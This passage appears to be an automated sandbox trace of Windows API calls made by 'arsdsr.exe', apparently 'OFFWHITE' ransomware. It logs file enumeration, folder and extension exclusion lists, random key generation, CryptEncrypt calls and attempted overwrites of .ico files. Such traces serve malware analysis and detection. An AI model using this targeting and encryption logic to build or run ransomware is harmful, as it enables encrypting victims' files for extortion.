GetProcessHeap () returned 0x500000 [0144.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53eb98 [0144.122] GetProcessHeap () returned 0x500000 [0144.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ebb0 [0144.122] GetProcessHeap () returned 0x500000 [0144.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55ec00 [0144.122] GetProcessHeap () returned 0x500000 [0144.122] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55ed08 [0144.122] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.122] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.122] SystemFunction036 (in: RandomBuffer=0x53eb98, RandomBufferLength=0x10 | out: RandomBuffer=0x53eb98) returned 1 [0144.122] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.122] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.122] SystemFunction036 (in: RandomBuffer=0x53ebb0, RandomBufferLength=0x10 | out: RandomBuffer=0x53ebb0) returned 1 [0144.122] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.122] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.122] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55ec00*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55ec00*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.123] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.123] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.123] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55ed08*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55ed08*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.123] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.123] SetLastError (dwErrCode=0x0) [0144.123] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55ec00, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.123] GetLastError () returned 0x6 [0144.123] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0eca86, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0eca86, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78c9009, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xe3c8, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="print_pref.ico", cAlternateFileName="")) returned 1 [0144.123] lstrcmpiW (lpString1="print_pref.ico", lpString2=".") returned 1 [0144.123] lstrcmpiW (lpString1="print_pref.ico", lpString2="..") returned 1 [0144.123] lstrcmpiW (lpString1="print_pref.ico", lpString2="...") returned 1 [0144.123] lstrcmpiW (lpString1="print_pref.ico", lpString2="windows") returned -1 [0144.123] lstrcmpiW (lpString1="print_pref.ico", lpString2="$recycle.bin") returned 1 [0144.123] lstrcmpiW (lpString1="print_pref.ico", lpString2="rsa") returned -1 [0144.123] lstrcmpiW (lpString1="print_pref.ico", lpString2="ntuser.dat") returned 1 [0144.123] lstrcmpiW (lpString1="print_pref.ico", lpString2="programdata") returned -1 [0144.123] lstrcmpiW (lpString1="print_pref.ico", lpString2="appdata") returned 1 [0144.123] lstrcmpiW (lpString1="print_pref.ico", lpString2="program files") returned -1 [0144.123] lstrcmpiW (lpString1="print_pref.ico", lpString2="program files (x86)") returned -1 [0144.123] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" [0144.124] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="print_pref.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" [0144.124] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.124] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.124] PathFindExtensionW (pszPath="print_pref.ico") returned=".ico" [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.124] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.124] lstrcmpiW (lpString1="print_pref.ico", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.124] GetProcessHeap () returned 0x500000 [0144.124] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e900 [0144.124] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_pref.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.125] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.125] GetProcessHeap () returned 0x500000 [0144.125] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ebc8 [0144.126] GetProcessHeap () returned 0x500000 [0144.126] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ebe0 [0144.126] GetProcessHeap () returned 0x500000 [0144.126] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55ee10 [0144.126] GetProcessHeap () returned 0x500000 [0144.126] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55ef18 [0144.126] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.126] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.126] SystemFunction036 (in: RandomBuffer=0x53ebc8, RandomBufferLength=0x10 | out: RandomBuffer=0x53ebc8) returned 1 [0144.126] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.126] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.126] SystemFunction036 (in: RandomBuffer=0x53ebe0, RandomBufferLength=0x10 | out: RandomBuffer=0x53ebe0) returned 1 [0144.126] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.126] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.126] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55ee10*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55ee10*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.126] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.126] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.126] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55ef18*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55ef18*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.127] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.127] SetLastError (dwErrCode=0x0) [0144.127] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55ee10, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.127] GetLastError () returned 0x6 [0144.127] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f0eca86, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f0eca86, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc78c9009, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xebb8, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="print_property.ico", cAlternateFileName="")) returned 1 [0144.127] lstrcmpiW (lpString1="print_property.ico", lpString2=".") returned 1 [0144.127] lstrcmpiW (lpString1="print_property.ico", lpString2="..") returned 1 [0144.127] lstrcmpiW (lpString1="print_property.ico", lpString2="...") returned 1 [0144.127] lstrcmpiW (lpString1="print_property.ico", lpString2="windows") returned -1 [0144.127] lstrcmpiW (lpString1="print_property.ico", lpString2="$recycle.bin") returned 1 [0144.127] lstrcmpiW (lpString1="print_property.ico", lpString2="rsa") returned -1 [0144.127] lstrcmpiW (lpString1="print_property.ico", lpString2="ntuser.dat") returned 1 [0144.127] lstrcmpiW (lpString1="print_property.ico", lpString2="programdata") returned -1 [0144.127] lstrcmpiW (lpString1="print_property.ico", lpString2="appdata") returned 1 [0144.127] lstrcmpiW (lpString1="print_property.ico", lpString2="program files") returned -1 [0144.127] lstrcmpiW (lpString1="print_property.ico", lpString2="program files (x86)") returned -1 [0144.127] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" [0144.127] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="print_property.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" [0144.127] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.127] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.128] PathFindExtensionW (pszPath="print_property.ico") returned=".ico" [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.128] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.128] lstrcmpiW (lpString1="print_property.ico", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.128] GetProcessHeap () returned 0x500000 [0144.128] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e910 [0144.128] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.129] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.129] GetProcessHeap () returned 0x500000 [0144.129] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ebf8 [0144.129] GetProcessHeap () returned 0x500000 [0144.129] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53ea18 [0144.129] GetProcessHeap () returned 0x500000 [0144.129] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55f020 [0144.129] GetProcessHeap () returned 0x500000 [0144.129] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55f128 [0144.129] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.129] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.129] SystemFunction036 (in: RandomBuffer=0x53ebf8, RandomBufferLength=0x10 | out: RandomBuffer=0x53ebf8) returned 1 [0144.129] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.129] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.129] SystemFunction036 (in: RandomBuffer=0x53ea18, RandomBufferLength=0x10 | out: RandomBuffer=0x53ea18) returned 1 [0144.129] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.129] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.129] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55f020*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55f020*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.129] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.130] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.130] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55f128*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55f128*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.130] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.130] SetLastError (dwErrCode=0x0) [0144.130] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55f020, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.130] GetLastError () returned 0x6 [0144.130] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f112be3, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f112be3, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7be8cbf, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xdff5, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="print_queue.ico", cAlternateFileName="")) returned 1 [0144.130] lstrcmpiW (lpString1="print_queue.ico", lpString2=".") returned 1 [0144.130] lstrcmpiW (lpString1="print_queue.ico", lpString2="..") returned 1 [0144.130] lstrcmpiW (lpString1="print_queue.ico", lpString2="...") returned 1 [0144.130] lstrcmpiW (lpString1="print_queue.ico", lpString2="windows") returned -1 [0144.130] lstrcmpiW (lpString1="print_queue.ico", lpString2="$recycle.bin") returned 1 [0144.130] lstrcmpiW (lpString1="print_queue.ico", lpString2="rsa") returned -1 [0144.130] lstrcmpiW (lpString1="print_queue.ico", lpString2="ntuser.dat") returned 1 [0144.130] lstrcmpiW (lpString1="print_queue.ico", lpString2="programdata") returned -1 [0144.130] lstrcmpiW (lpString1="print_queue.ico", lpString2="appdata") returned 1 [0144.130] lstrcmpiW (lpString1="print_queue.ico", lpString2="program files") returned -1 [0144.130] lstrcmpiW (lpString1="print_queue.ico", lpString2="program files (x86)") returned -1 [0144.130] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" [0144.131] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="print_queue.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" [0144.131] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.131] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.131] PathFindExtensionW (pszPath="print_queue.ico") returned=".ico" [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.131] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.131] lstrcmpiW (lpString1="print_queue.ico", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.131] GetProcessHeap () returned 0x500000 [0144.131] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e920 [0144.131] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0144.137] GetFileSizeEx (in: hFile=0xffffffff, lpFileSize=0x295d1e0 | out: lpFileSize=0x295d1e0*=-4251594172) returned 0 [0144.137] GetProcessHeap () returned 0x500000 [0144.137] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53e9e8 [0144.138] GetProcessHeap () returned 0x500000 [0144.138] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x53e9d0 [0144.138] GetProcessHeap () returned 0x500000 [0144.138] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55f230 [0144.138] GetProcessHeap () returned 0x500000 [0144.138] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x55f338 [0144.138] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.138] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.138] SystemFunction036 (in: RandomBuffer=0x53e9e8, RandomBufferLength=0x10 | out: RandomBuffer=0x53e9e8) returned 1 [0144.138] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.138] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.138] SystemFunction036 (in: RandomBuffer=0x53e9d0, RandomBufferLength=0x10 | out: RandomBuffer=0x53e9d0) returned 1 [0144.138] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.138] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.138] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55f230*, pdwDataLen=0x295cf90*=0x10, dwBufLen=0x100 | out: pbData=0x55f230*, pdwDataLen=0x295cf90*=0x100) returned 1 [0144.138] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.138] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.138] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x55f338*, pdwDataLen=0x295cf8c*=0x10, dwBufLen=0x100 | out: pbData=0x55f338*, pdwDataLen=0x295cf8c*=0x100) returned 1 [0144.139] SetFilePointerEx (in: hFile=0xffffffff, liDistanceToMove=0x295d244, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0144.139] SetLastError (dwErrCode=0x0) [0144.139] WriteFile (in: hFile=0xffffffff, lpBuffer=0x55f230, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x295d1cc, lpOverlapped=0x0) returned 0 [0144.139] GetLastError () returned 0x6 [0144.139] FindNextFileW (in: hFindFile=0x544750, lpFindFileData=0x295d218 | out: lpFindFileData=0x295d218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f138d40, ftCreationTime.dwHighDateTime=0x1ca040c, ftLastAccessTime.dwLowDateTime=0x5f138d40, ftLastAccessTime.dwHighDateTime=0x1ca040c, ftLastWriteTime.dwLowDateTime=0xc7c0ee1d, ftLastWriteTime.dwHighDateTime=0x1c9ea0e, nFileSizeHigh=0x0, nFileSizeLow=0xec75, dwReserved0=0x660064, dwReserved1=0x295dcf0, cFileName="scan_.ico", cAlternateFileName="")) returned 1 [0144.139] lstrcmpiW (lpString1="scan_.ico", lpString2=".") returned 1 [0144.139] lstrcmpiW (lpString1="scan_.ico", lpString2="..") returned 1 [0144.139] lstrcmpiW (lpString1="scan_.ico", lpString2="...") returned 1 [0144.139] lstrcmpiW (lpString1="scan_.ico", lpString2="windows") returned -1 [0144.139] lstrcmpiW (lpString1="scan_.ico", lpString2="$recycle.bin") returned 1 [0144.139] lstrcmpiW (lpString1="scan_.ico", lpString2="rsa") returned 1 [0144.139] lstrcmpiW (lpString1="scan_.ico", lpString2="ntuser.dat") returned 1 [0144.139] lstrcmpiW (lpString1="scan_.ico", lpString2="programdata") returned 1 [0144.139] lstrcmpiW (lpString1="scan_.ico", lpString2="appdata") returned 1 [0144.139] lstrcmpiW (lpString1="scan_.ico", lpString2="program files") returned 1 [0144.139] lstrcmpiW (lpString1="scan_.ico", lpString2="program files (x86)") returned 1 [0144.139] lstrcpyW (in: lpString1=0x295d468, lpString2="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\" [0144.139] lstrcatW (in: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\", lpString2="scan_.ico" | out: lpString1="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico") returned="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" [0144.139] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0144.139] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0144.140] PathFindExtensionW (pszPath="scan_.ico") returned=".ico" [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".exe") returned 1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".log") returned -1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".cab") returned 1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".cmd") returned 1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".com") returned 1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".cpl") returned 1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".ini") returned -1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".dll") returned 1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".url") returned -1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".ttf") returned -1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".mp3") returned -1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".pif") returned -1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".mp4") returned -1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".OFFWHITE") returned -1 [0144.140] lstrcmpiW (lpString1=".ico", lpString2=".msi") returned -1 [0144.140] lstrcmpiW (lpString1="scan_.ico", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0144.140] GetProcessHeap () returned 0x500000 [0144.140] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x52e930 [0144.140] CreateFileW (lpFileName="C:/Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\users\\all users\\microsoft\\device 